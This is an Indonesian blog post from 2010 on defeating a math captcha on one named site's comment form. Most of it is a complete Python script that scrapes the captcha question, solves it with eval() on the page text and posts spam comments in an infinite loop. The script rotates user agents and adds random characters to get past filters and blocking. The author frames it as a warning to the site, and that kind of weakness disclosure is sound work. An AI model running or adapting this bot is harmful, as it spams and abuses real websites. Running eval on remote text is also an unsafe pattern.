break a time, with break the c0de…

Archive for September, 2010

virusindonesia.com captcha broke


yah, tadi awalnya cuma iseng
ngeliat virus yang dibuat sama temen
bisa dilihat disini :
http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/

berhubungan saya lagi banyak bereksperimen tentang captcha
sekaligus saya hanya ingin mengingatkan bahwa captcha tersebut tidak baik
mengingat bahwa captcha tersebut dapat di kalahkan dengan metode simulasi

berikut sourcecode dari program…

#!/usr/bin/python
import mechanize, cookielib, re, time, random
randstring	= ['a','b','c','d','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
		   'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
		   '1','2','3','4','5','6','7','8','9','0'
		  ]
header = {
          "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Language": "en-us,en;q=0.5",
          "Accept-Encoding": "gzip,deflate",
          "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
          "Keep-Alive": "99999",
          "Proxy-Connection": "keep-alive",
          "Content-Type": "application/x-www-form-urlencoded"
}
ouruseragent 	= ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
		'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
        	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
        	'Microsoft Internet Explorer/4.0b1 (Windows 95)',
        	'Opera/8.00 (Windows NT 5.1; U; en)',
		'amaya/9.51 libwww/5.4.0',
		'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
		'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
		'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
		
br = mechanize.Browser()
# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Want debugging messages ??
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
# try to cheating
br.addheaders = [('User-agent', random.choice(ouruseragent))]

def main():
	'''infinite loop'''
	while 1:
		print "[*] Going to virusindonesia.com"
		page = br.open("http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/")
		read = page.read()
		captcha = re.findall("<strong>Hasil dari (.*) ?</strong>",read)
		captchaclean = captcha[0]
		captchaclean = captchaclean.replace(" ?","")
		print "[*] Got question   : %s " % captchaclean
		result = eval(''.join([str(x) for x in captchaclean])) # we give her to thinking some math ;)
		print "[*] Program answer : %d " % int(result)
		br.select_form(nr=1)
		br.form['author'] = 'rise of robot !!!'
		br.form['email'] = 'yudha.gunslinger@gmail[dot]com'
		br.form['url'] = 'http://gunslingerc0de.wordpress[dot]com'
		br.form['mcspvalue'] = str(result)
		br.form['comment'] = '''
		RISE OF ROBOT !!
		
		YOUR CAPTCHA DEFEATED !!
		PLEASE PATCH !!
		https://gunslingerc0de.wordpress.com
		%s%s%s
		''' % (str(random.choice(randstring)), str(random.choice(randstring)), str(random.choice(randstring))) # prevent blocking by string checker ;)
		br.submit()
		# print br.response().read()
		print "[*] Spammed successfully..."
		time.sleep(1)
		print "[*] Sleeping for 30 seconds please wait"
		time.sleep(30) # prevent blocking too, so wee need time.sleep() ;)... or we got forbidden status ;)
		print "[*] Ready to rock baby..."
		
if __name__ == '__main__':
	main()

ketika saya telah mengingatkan dengan beberapa spam, beberapa menit kemudian sudah di hapus oleh virusindonesia sendiri (well good job quick responds)
dengan ini saya harap situs tersebut mau mengganti captchanya agar tidak terspamming oleh yang lain ;)